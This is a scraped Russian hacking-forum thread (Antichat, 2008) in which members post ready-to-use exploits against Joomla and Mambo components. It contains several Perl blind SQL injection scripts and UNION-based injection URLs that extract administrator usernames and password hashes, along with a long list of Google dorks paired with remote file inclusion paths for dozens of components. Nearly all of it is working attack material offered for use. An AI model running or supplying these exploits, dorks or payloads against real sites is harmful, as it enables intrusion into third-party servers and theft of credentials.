Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.05.2008, 20:21
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
Код:
###############################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# there are alot site but exploit not working for all ı found alot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :
index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
<name>garyscookbook</name>
<creationDate>4-9-2005</creationDate>
<author>Gerald Berger</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>gerald@vb-dozent.net</authorEmail>
<authorUrl>www.vb-dozent.net</authorUrl>
<version>1.1.1</version>
<description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>
|
|
|
29.05.2008, 09:15
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
нашел у себя на компе, хз может баян
Код:
inurl:"com_flyspray"
Site Sonuna:
/components/com_flyspray/startdown.php?file=shell
Google Dork:
inurl:"com_admin"
Site Sonuna:
administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_simpleboard
Site Sonuna:
/components/com_simpleboard/file_upload.php?sbp=shell
Google Dork:
inurl:"com_hashcash"
Site Sonuna:
/components/com_hashcash/server.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_htmlarea3_xtd-c"
Code:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_sitemap"
Code:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_performs"
Site Sonuna:
components/com_performs/performs.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_forum"
Site Sonuna:
/components/com_forum/download.php?phpbb_root_path=
Google Dork:
inurl:"com_pccookbook"
Site Sonuna:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_extcalendar
Site Sonuna:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"minibb"
Site Sonuna:
components/minibb/index.php?absolute_path=shell
Google Dork:
inurl:"com_smf"
Site Sonuna:
/components/com_smf/smf.php?mosConfig_absolute_path=
Site Sonuna2:
/modules/mod_calendar.php?absolute_path=shell
Google Dork:
inurl:"com_pollxt"
Site Sonuna:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_loudmounth"
Site Sonuna:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_videodb"
Site Sonuna:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_pcchess
Site Sonuna:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_multibanners"
Site Sonuna:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_a6mambohelpdesk"
Site Sonuna:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell
Google Dork:
inurl:"com_colophon"
Site Sonuna:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_mgm"
Site Sonuna:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_mambatstaff"
Site Sonuna:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_securityimages"
Site Sonuna:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
Site Sonuna2:
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_artlinks"
Site Sonuna:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_galleria"
Site Sonuna:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_akocomment"
Site Sonuna:
/akocomments.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_cropimage"
Site Sonuna:
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
Google Dork:
inurl:"com_kochsuite"
Site Sonuna:
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_comprofiler"
Site Sonuna:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_zoom"
Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
Site Sonuna2:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_serverstat"
Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_fm"
Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=shell
Google Dork:
inurl:com_mambelfish
Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_lmo
Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_linkdirectory
Site Sonuna:
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell
Google Dork:
inurl:com_mtree
Site Sonuna:
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_jim
Site Sonuna:
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_webring
Site Sonuna:
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
Google Dork:
inurl:com_remository
Site Sonuna:
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Google Dork:
inurl:com_babackup
Site Sonuna:
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_lurm_constructor
Site Sonuna:
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
Google Dork:
inurl:com_mambowiki
Site Sonuna:
components/com_mambowiki/ MamboLogin.php?IP=shell
Google Dork:
inurl:com_a6mambocredits
Site Sonuna:
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
Google Dork:
inurl:com_phpshop
Site Sonuna:
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_cpg
Site Sonuna:
components/com_cpg/cpg.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_moodle
Site Sonuna:
components/com_moodle/moodle.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_extended_registration
Site Sonuna:
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=shell
Код:
Google Dork:
inurl:com_mospray
Site Sonuna:
components/com_mospray/scripts/admin.php?basedir=shell
Google Dork:
inurl:com_bayesiannaivefilter
Site Sonuna:
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_uhp
Site Sonuna:
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_peoplebook
Site Sonuna:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_mmp
Site Sonuna:
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_reporter
Site Sonuna:
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_madeira
Site Sonuna:
/components/com_madeira/img.php?url=shell
Google Dork:
inurl:com_jd-wiki
Site Sonuna:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_bsq_sitestats
Site Sonuna:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Site Sonuna2:
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Dork:
com_comprofiler
Expl:
administrator/components/com_comprofiler/plugin.class.
php?mosConfig_absolute_path=[Shell]
Dork:
inurl:com_multibanners
Expl:
/administrator/components/com_multibanners/extadminmenus.class.
php?mosConfig_absolute_path=[Shell]
Dork:
inurl:com_colophon
expl:
administrator/components/com_colophon/admin.colophon.
php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_simpleboard
Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]
Dork:
inurl:"com_hashcash"
Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"
Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.
php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"
Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]
--
Dork:
inurl:"com_forum"
Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"
Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_extcalendar
Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"minibb"
Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"
Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]
Expl:
/modules/mod_calendar.php?absolute_path=[Shell]
Dork:
inurl:"com_pollxt"
Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_loudmounth"
Expl:
/components/com_loudmounth/includes/abbc/abbc.class.
php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"
Expl:
/components/com_videodb/core/videodb.class.xml.
php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_pcchess
Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_multibanners"
Expl:
/administrator/components/com_multibanners/extadminmenus.class.
php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_a6mambohelpdesk"
Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.
php?mosConfig_live_site=[Shell]
Dork:
inurl:"com_colophon"
Expl:
/administrator/components/com_colophon/admin.colophon.
php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_mgm"
Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_mambatstaff"
Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_securityimages"
Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]
Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_artlinks"
Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"
Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]
|
|
|
|
02.06.2008, 15:37
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component mycontent Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl mycontent.pl host path <options> #\n";
print " # Example: perl mycontent.pl www.host.com /joomla/ -r 10 #\n";
print " # #\n";
print " # Options: #\n";
print " # -r Valid id #\n";
print " # Note: #\n";
print " # If the exploit failed #\n";
print " # Change 'regexp' value to the title of the page #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $rid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"r"})
{
$rid = $options{"r"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $rid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "E-mail";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-01]
Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component Joo!BB Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl jobb.pl host path <options> #\n";
print " # Example: perl jobb.pl www.host.com /joomla/ -f 1 #\n";
print " # #\n";
print " # Options: #\n";
print " # -f Forum id #\n";
print " # Note: #\n";
print " # If you need to change the match value so do it :D #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $fid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"f"})
{
$fid = $options{"f"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $fid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Announcements";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-01]
milw0rm.com
|
|
|
|
03.06.2008, 01:11
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Joomla Component acctexp <= 0.12.x Blind SQL Injection Ex
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component acctexp Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl acctexp.pl host path <options> #\n";
print " # Example: perl acctexp.pl www.host.com /joomla/ -g 1 #\n";
print " # #\n";
print " # Options: #\n";
print " # -g usage id #\n";
print " # Note: #\n";
print " # Don't forget to change the match if you have to do it :)#\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $gid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "g=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"g"})
{
$gid = $options{"g"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $gid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $gid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $rid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Verify Password";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
|
|
|
|
04.06.2008, 20:22
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
Joomla Component jotloader <= 1.2.1.a Blind SQL injection
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
print " o Joomla Component jotloader Blind SQL Injection Exploit o\n";
print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
print " o o\n";
print " o Conctact: His0k4.hlm[at]gamil.com o\n";
print " o Greetz: All friends & muslims HacKeRs o\n";
print " o o\n";
print " o Dork : inurl:com_jotloader o\n";
print " o Usage: perl jotloader.pl host path <options> o\n";
print " o Example: perl jotloader.pl www.host.com /joomla/ -c 5 o\n";
print " o o\n";
print " o Options: o\n";
print " o -c valid cid id o\n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $cid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "c=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"c"})
{
$cid = $options{"c"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $cid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $cid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $cid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "files.download";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-04]
|
|
|
|
Joomla Component EasyBook 1.1 SQL Injection Exploit |
05.06.2008, 15:37
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Joomla Component EasyBook 1.1 SQL Injection Exploit
Joomla Component EasyBook 1.1 SQL Injection Exploit
Код:
#!/usr/bin/perl
use IO::Socket;
use strict;
##### INFO##############################
# Example: #
# Host: artsbymonique.lu #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################
print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gbid= --+-\n";
print "-+-- Dork: com_easybook --+-\n\n";
print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);
my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket "POST /index.php HTTP/1.0\n".
"Host: www.$host\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: 214\n\n".
"option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
while(<$socket>)
{
$s = <$socket>;
if($s=~/:::(.+):::/){
$lhs = $1;
($l,$h,$s)=split(':',$lhs);
print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
close $socket;
exit; }
}
die ("Exploit failed!");
 POST only
|
|
|
|
05.06.2008, 16:12
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
Joomla Component simpleshop <= 3.4 SQL injection
/---------------------------------------------------------------\
\ /
/ Joomla Component simpleshop Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_simpleshop[*] Dork : inurl:com_simpleshop "catid"
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid =29&catid={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid =29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user( ),user(),user(),user(),user() FROM jos_users--
------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
milw0rm.com [2008-06-05]
|
|
|
|
joomla Sql Injection Scanner V 1.0 |
08.06.2008, 15:22
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
joomla Sql Injection Scanner V 1.0
http://beenuarora.com/code/joomsq.py
|
|
|
|
08.06.2008, 18:33
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability
Код:
/---------------------------------------------------------------\
\ /
/ Joomla Component GameQ Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--
|
|
|
|
09.06.2008, 14:15
|
|
Познающий
Регистрация: 01.01.2008
Сообщений: 91
Провел на форуме:
994508
Репутация:
143
|
|
Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
print " o Joomla Component yvcomment Blind SQL Injection Exploit o\n";
print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
print " o o\n";
print " o Conctact: His0k4.hlm[at]gamil.com o\n";
print " o Greetz: All friends & muslims HacKeRs o\n";
print " o o\n";
print " o Dork : inurl:yvcomment o\n";
print " o Usage: perl yvcomment.pl host path <options> o\n";
print " o Example: perl yvcomment.pl www.host.com /joomla/ -a 2 o\n";
print " o o\n";
print " o Options: o\n";
print " o -a valid Article id o\n";
print " o Note: o\n";
print " o You can Change the match string by any content of the correct query o\n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "DateAndAuthor";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-08]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
